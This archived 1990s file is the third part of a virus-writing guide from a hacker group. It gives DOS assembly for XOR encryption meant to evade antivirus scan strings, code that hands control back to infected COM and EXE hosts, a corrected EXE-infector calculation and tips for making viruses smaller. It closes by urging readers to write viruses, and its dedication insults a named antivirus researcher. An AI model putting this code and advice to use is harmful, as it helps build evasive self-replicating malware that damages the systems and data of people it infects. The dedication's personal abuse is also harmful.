💾 Archived View for spam.works › mirrors › textfiles › virus › ps_vir3.vir captured on 2023-11-04 at 16:02:44.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

      //==//  //  //  /||      //      //====  //==//  //|   //
     //  //  //  //  //||     //      //      //  //  //||  //
    //==//  //==//  //=||    //      //      //  //  // || //
   //      //  //  //  ||   //      //      //  //  //  ||//
  //      //  //  //   ||  //====  //====  //==//  //   ||/
  
     /====   // //     //  /====   /|   /|
    //      // //     //  //      //|  //|
    ===\   // //     //   ===\   //|| //||
      //  //  \\    //      //  // ||// ||
  ====/  //    \\  //   ====/  //  ||/  ||
  
  ???????????????????????????????????????????????
  DISCLAIMER: I hereby claim to have written this
    file.
  ???????????????????????????????????????????????
  DEDICATION: This is dedicated to Patty Hoffman,
    that fat bitch who doesn't know her own name,
    and to the millions of dumb fools who were so
    scared by Michelangelo that they didn't touch
    their computers for an entire day.
  ???????????????????????????????????????????????
  GREETS: to all PHALCON/SKISM members especially
    Garbageheap, Hellraiser, and Demogorgon.
  ???????????????????????????????????????????????
  
  Dark Angel's Crunchy Virus Writing Guide
  ???? ??????? ??????? ????? ??????? ?????
       "It's the right thing to do"
  
  ????????????????????????????????????????????
  INSTALLMENT III:  NONRESIDENT VIRII, PART II
  ????????????????????????????????????????????
  
  Welcome to  the third  installment of  my Virus  Writing  Guide.    In  the
  previous installment,  I covered  the primary  part  of  the  virus  -  the
  replicator.   As promised,  I shall  now cover  the rest of the nonresident
  virus and  present code  which, when  combined with  code from the previous
  installment, will  be sufficient  to allow  anyone to write a simple virus.
  Additionally, I  will present  a few  easy tricks  and tips  which can help
  optimise your code.
  
  ?????????????
  THE CONCEALER
  ?????????????
  The concealer  is the  most common  defense  virus  writers  use  to  avoid
  detection of  virii.   The most common encryption/decryption routine by far
  is the XOR, since it may be used for both encryption and decryption.
  
  encrypt_val   dw   ?   ; Should be somewhere in decrypted area
  
  decrypt:
  encrypt:
       mov dx, word ptr [bp+encrypt_val]
       mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
       lea si, [bp+part_to_encrypt_start]
       mov di, si
  
  xor_loop:
       lodsw
       xor ax, dx
       stosw
       loop xor_loop
  
  The previous  routine uses  a simple XOR routine to encrypt or decrypt code
  in memory.   This  is essentially  the same routine as the one in the first
  installment, except  it encrypts words rather than bytes.  It therefore has
  65,535 mutations  as opposed  to 255 and is also twice as fast.  While this
  routine is  simple to  understand, it  leaves much  to be  desired as it is
  large and therefore is almost begging to be a scan string.  A better method
  follows:
  
  encrypt_val   dw    ?
  
  decrypt:
  encrypt:
       mov dx, word ptr [bp+encrypt_val]
       lea bx, [bp+part_to_encrypt_start]
       mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
  
  xor_loop:
       xor word ptr [bx], dx
       add bx, 2
       loop xor_loop
  
  Although this  code is  much shorter,  it is possible to further reduce its
  size.   The best  method is  to insert the values for the encryption value,
  BX, and CX, in at infection-time.
  
  decrypt:
  encrypt:
       mov bx, 0FFFFh
       mov cx, 0FFFFh
  
  xor_loop:
       xor word ptr [bx], 0FFFFh
       add bx, 2
       loop xor_loop
  
  All the  values denoted  by 0FFFFh  may be changed upon infection to values
  appropriate for  the infected  file.  For example, BX should be loaded with
  the offset  of part_to_encrypt_start  relative to the start of the infected
  file when the encryption routine is written to the infected file.
  
  The primary  advantage of  the code  used above is the minimisation of scan
  code length.   The scan code can only consist of those portions of the code
  which remain  constant.   In this  case,  there  are  only  three  or  four
  consecutive bytes  which remain  constant.   Since  the  entire  encryption
  consist of only about a dozen bytes, the size of the scan code is extremely
  tiny.
  
  Although the  function of  the encryption  routine is  clear,  perhaps  the
  initial encryption  value and  calculation of  subsequent values  is not as
  lucid.  The initial value for most XOR encryptions should be 0.  You should
  change the  encryption value  during  the  infection  process.    A  random
  encryption value  is desired.   The  simplest method  of obtaining a random
  number is  to consult  to internal  clock.   A random  number may be easily
  obtained with a simple:
  
          mov     ah, 2Ch                         ; Get me a random number.
          int     21h
          mov     word ptr [bp+encrypt_val], dx   ; Can also use CX
  
  Some encryption  functions do not facilitate an initial value of 0.  For an
  example, take  a look  at Whale.  It uses the value of the previous word as
  an encryption  value.   In these  cases, simply  use a JMP to skip past the
  decryption routine  when coding  the virus.   However, make sure infections
  JMP to  the right location!  For example, this is how you would code such a
  virus:
  
          org     100h
  
  start:
          jmp     past_encryption
  
  ; Insert your encryption routine here
  
  past_encryption:
  
  The encryption  routine is  the ONLY  part of  the virus  which needs to be
  unencrypted.   Through code-moving  techniques, it  is possible to copy the
  infection mechanism  to the  heap (memory location past the end of the file
  and before  the stack).   All  that is required is a few MOVSW instructions
  and one  JMP.   First the  encryption routine  must  be  copied,  then  the
  writing, then  the decryption,  then the  RETurn back  to the program.  For
  example:
  
       lea si, [bp+encryption_routine]
       lea di, [bp+heap]
       mov cx, encryption_routine_size
       push si
       push cx
       rep movsb
  
       lea si, [bp+writing_routine]
       mov cx, writing_routine_size
       rep movsb
  
       pop cx
       pop si
       rep movsb
  
       mov al, 0C3h                             ; Tack on a near return
       stosb
  
       call [bp+heap]
  
  Although most  virii, for  simplicity's sake, use the same routine for both
  encryption  and  decryption,  the  above  code  shows  this  is  completely
  unnecessary.   The only  modification of  the above code for inclusion of a
  separate decryption  routine is to take out the PUSHes and replace the POPs
  with the appropriate LEA si and MOV cx.
  
  Original encryption  routines, while  interesting, might  not be  the best.
  Stolen encryption  routines are  the best,  especially  those  stolen  from
  encrypted shareware  programs!   Sydex is notorious for using encryption in
  their shareware  programs.   Take a  look at  a  shareware  program's  puny
  encryption and  feel free  to copy  it into your own.  Hopefully, the anti-
  viral developers  will create  a scan string which will detect infection by
  your virus in shareware products simply because the encryption is the same.
  
  Note that  this is  not a  full treatment  of concealment routines.  A full
  text file could be written on encryption/decryption techniques alone.  This
  is only  the simplest  of all  possible encryption techniques and there are
  far more  concealment techniques  available.  However, for the beginner, it
  should suffice.
  
  ??????????????
  THE DISPATCHER
  ??????????????
  The dispatcher  is the  portion of the virus which restores control back to
  the infected  program.    The  dispatchers  for  EXE  and  COM  files  are,
  naturally, different.
  
  In COM  files, you  must restore  the bytes  which were overwritten by your
  virus and  then transfer  control back  to CS:100h,  which is where all COM
  files are initially loaded.
  
  RestoreCOM:
       mov di, 100h                     ; We are copying to the beginning
       lea si, [bp+savebuffer]          ; We are copying from our buffer
       push di                          ; Save offset for return (100h)
       movsw                            ; Mo efficient than mov cx, 3, movsb
       movsb                            ; Alter to meet your needs
       retn                             ; A JMP will also work
  
  EXE files  require simply  the restoration of the stack segment/pointer and
  the code segment/instruction pointer.
  
  ExeReturn:
          mov     ax, es                           ; Start at PSP segment
          add     ax, 10h                          ; Skip the PSP
          add     word ptr cs:[bp+ExeWhereToJump+2], ax
          cli
          add     ax, word ptr cs:[bp+StackSave+2] ; Restore the stack
          mov     ss, ax
          mov     sp, word ptr cs:[bp+StackSave]
          sti
          db      0eah                             ; JMP FAR PTR SEG:OFF
  ExeWhereToJump:
          dd      0
  StackSave:
          dd      0
  
  ExeWhereToJump2 dd 0
  StackSave2      dd 0
  
  Upon  infection,   the  initial   CS:IP  and  SS:SP  should  be  stored  in
  ExeWhereToJump2 and StackSave2, respectively.  They should then be moved to
  ExeWhereToJump and  StackSave before  restoration of  the  program.    This
  restoration may be easily accomplished with a series of MOVSW instructions.
  
  Some like  to clear all the registers prior to the JMP/RET, i.e. they issue
  a bunch  of XOR  instructions.   If you  feel happy  and wish to waste code
  space, you are welcome to do this, but it is unnecessary in most instances.
  
  ????????
  THE BOMB
  ????????
  
    "The horror!  The horror!"
       - Joseph Conrad, The Heart of Darkness
  
  What goes through the mind of a lowly computer user when a virus activates?
  What terrors  does the unsuspecting victim undergo as the computer suddenly
  plays a  Nazi tune?  How awful it must be to lose thousands of man-hours of
  work in an instant!
  
  Actually, I  do not  support wanton destruction of data and disks by virii.
  It serves  no purpose  and usually  shows little imagination.  For example,
  the world-famous Michelangelo virus did nothing more than overwrite sectors
  of the  drive with  data taken at random from memory.  How original.  Yawn.
  Of course,  if you  are hell-bent  on destruction, go ahead and destroy all
  you want,  but just  remember that this portion of the virus is usually the
  only part  seen by  "end-users" and distinguishes it from others.  The best
  examples to date include: Ambulance Car, Cascade, Ping Pong, and Zero Hunt.
  Don't forget the PHALCON/SKISM line, especially those by me (I had to throw
  in a plug for the group)!
  
  As you  can see,  there's no  code to  speak of in this section.  Since all
  bombs should be original, there isn't much point of putting in the code for
  one, now  is there!   Of course, some virii don't contain any bomb to speak
  of.   Generally speaking,  only those  under about  500 bytes  lack  bombs.
  There is no advantage of not having a bomb other than size considerations.
  
  ?????????
  MEA CULPA
  ?????????
  I regret  to inform  you that  the  EXE  infector  presented  in  the  last
  installment was  not quite  perfect.   I admit  it.   I made  a mistake  of
  colossal proportions   The  calculation of  the file size and file size mod
  512 was screwed up.  Here is the corrected version:
  
  ; On entry, DX:AX hold the NEW file size
  
          push    ax                          ; Save low word of filesize
          mov     cl, 9                       ; 2^9 = 512
          shr     ax, cl                      ; / 512
          ror     dx, cl                      ; / 512 (sort of)
          stc                                 ; Check EXE header description
                                              ; for explanation of addition
          adc     dx, ax                      ; of 1 to the DIV 512 portion
          pop     ax                          ; Restore low word of filesize
          and     ah, 1                       ; MOD 512
  
  This results  in the file size / 512 + 1 in DX and the file size modulo 512
  in AX.   The  rest remains  the same.  Test your EXE infection routine with
  Microsoft's LINK.EXE,  since it  won't run  unless  the  EXE  infection  is
  perfect.
  
  I have  saved you  the trouble  and smacked myself upside the head for this
  dumb error.
  
  ???????????????
  TIPS AND TRICKS
  ???????????????
  So now  all the  parts of  the nonresident  virus have been covered.  Yet I
  find myself  left with several more K to fill.  So, I shall present several
  simple techniques anyone can incorporate into virii to improve efficiency.
  
  1.   Use the heap
       The heap  is the memory area between the end of code and the bottom of
       the stack.   It can be conveniently treated as a data area by a virus.
       By moving  variables to the heap, the virus need not keep variables in
       its code,  thereby reducing  its length.  Note that since the contents
       heap are  not part  of the  virus, only  temporary variables should be
       kept there,  i.e. the  infection routine  should not count the heap as
       part of  the virus as that would defeat the entire purpose of its use.
       There are two ways of using the heap:
       
       ; First method
       
       EndOfVirus:
       Variable1 equ $
       Variable2 equ Variable1 + LengthOfVariable1
       Variable3 equ Variable2 + LengthOfVariable2
       Variable4 equ Variable3 + LengthOfVariable3
       
       ; Example of first method
       
       EndOfVirus:
       StartingDirectory = $
       TemporaryDTA      = StartingDirectory + 64
       FileSize          = TemporaryDTA + 42
       Flag              = FileSize + 4
       
       ; Second method
       
       EndOfVirus:
       Variable1 db LengthOfVariable1 dup (?)
       Variable2 db LengthOfVariable2 dup (?)
       Variable3 db LengthOfVariable3 dup (?)
       Variable4 db LengthOfVariable4 dup (?)
       
       ; Example of second method
       EndOfVirus:
       StartingDirectory db 64 dup (?)
       TemporaryDTA      db 42 dup (?)
       FileSize          dd ?
       Flag              db ?
       
       The two  methods differ  slightly.   By using  the first  method,  you
       create a  file which  will be  the exact  length of  the  virus  (plus
       startup  code).     However,  when  referencing  the  variables,  size
       specifications such as BYTE PTR, WORD PTR, DWORD PTR, etc. must always
       be used  or the  assembler will  become befuddled.   Secondly,  if the
       variables need  to be  rearranged for some reason, the entire chain of
       EQUates will  be destroyed  and must  be rebuilt.   Virii  coded  with
       second method  do not need size specifications, but the resulting file
       will be  larger than  the actual size of the virus.  While this is not
       normally a  problem, depending on the reinfection check, the virus may
       infect the  original file  when run.   This  is not  a big disability,
       especially considering the advantages of this method.
       
       In any  case, the  use of  the heap  can greatly  lessen the effective
       length of the virus code and thereby make it much more efficient.  The
       only thing  to watch  out for  is infecting  large COM files where the
       heap will  "wrap around"  to offset  0 of the same segment, corrupting
       the PSP.   However,  this problem is easily avoided.  When considering
       whether a  COM file is too large to infect for this reason, simply add
       the temporary variable area size to the virus size for the purposes of
       the check.
  
  2.   Use procedures
       Procedures are  helpful in  reducing the  size of  the virus, which is
       always a  desired goal.   Only  use procedures if they save space.  To
       determine the amount of bytes saved by the use of a procedure, use the
       following formula:
       
       Let PS = the procedure size, in bytes
       bytes saved = (PS - 4) * number invocations - PS
       
       For example, the close file procedure,
       
       close_file:
         mov ah, 3eh      ; 2 bytes
         int 21h          ; 2 bytes
         ret              ; 1 byte
                          ; PS = 2+2+1 = 5
       
       is only  viable if  it is used 6 or more times, as (5-4)*6 - 5 = 1.  A
       whopping savings of one (1) byte!  Since no virus closes a file in six
       different places,  the close  file procedure  is clearly  useless  and
       should be avoided.
       
       Whenever  possible,  design  the  procedures  to  be  as  flexible  as
       possible.   This is the chief reason why Bulgarian coding is so tight.
       Just take  a look  at the source for Creeping Death.  For example, the
       move file pointer procedure:
       
       go_eof:
         mov al, 2
       move_fp:
         xor dx, dx
       go_somewhere:
         xor cx, cx
         mov ah, 42h
         int 21h
         ret
       
       The function  was build  with flexibility  in mind.   With  a CALL  to
       go_eof, the  procedure will  move the  file pointer  to the end of the
       file.   A CALL  to move_fp  with AL set to 0, the file pointer will be
       reset.   A CALL  to go_somewhere  with DX and AL set, the file pointer
       may be  moved anywhere  within the  file.   If the  function  is  used
       heavily, the savings could be enormous.
  
  3.   Use a good assembler and debugger
       The best  assembler I have encountered to date is Turbo Assembler.  It
       generates tight  code extremely  quickly.    Use  the  /m2  option  to
       eliminate all  placeholder NOPs  from the  code.   The advantages  are
       obvious - faster development and smaller code.
       
       The best  debugger is  also made  by Borland,  the king of development
       tools.   Turbo Debugger  has so many features that you might just want
       to buy  it so  you can  read the  manual!  It can bypass many debugger
       traps with ease and is ideal for testing.  Additionally, this debugger
       has 286  and 386  specific protected  mode versions, each of which are
       even more powerful than their real mode counterparts.
  
  4.   Don't use MOV instead of LEA
       When writing your first virus, you may often forget to use LEA instead
       of MOV  when loading  offsets.  This is a serious mistake and is often
       made by  beginning virus  coders.   The  harmful  effects  of  such  a
       grevious error  are immediately obvious.  If the virus is not working,
       check for  this bug.   It's  almost as hard to catch as a NULL pointer
       error in C.
  
  5.   Read the latest issues of 40Hex
       40Hex, PHALCON/SKISM's  official journal of virus techniques and news,
       is a publication not to be missed by any self-respecting virus writer.
       Each issue  contains techniques  and source code, designed to help all
       virus writers,  be they  beginners or  experts.  Virus-related news is
       also published.  Get it, read it, love it, eat it!
  
  ??????
  SO NOW
  ??????
  you have  all the  code and information sufficient to write a viable virus,
  as well  as a  wealth of  techniques to  use.   So stop  reading and  start
  writing!   The only  way to  get better  is through practise.  After two or
  three tries, you should be well on your way to writing good virii.

Downloaded From P-80 International Information Systems 304-744-2253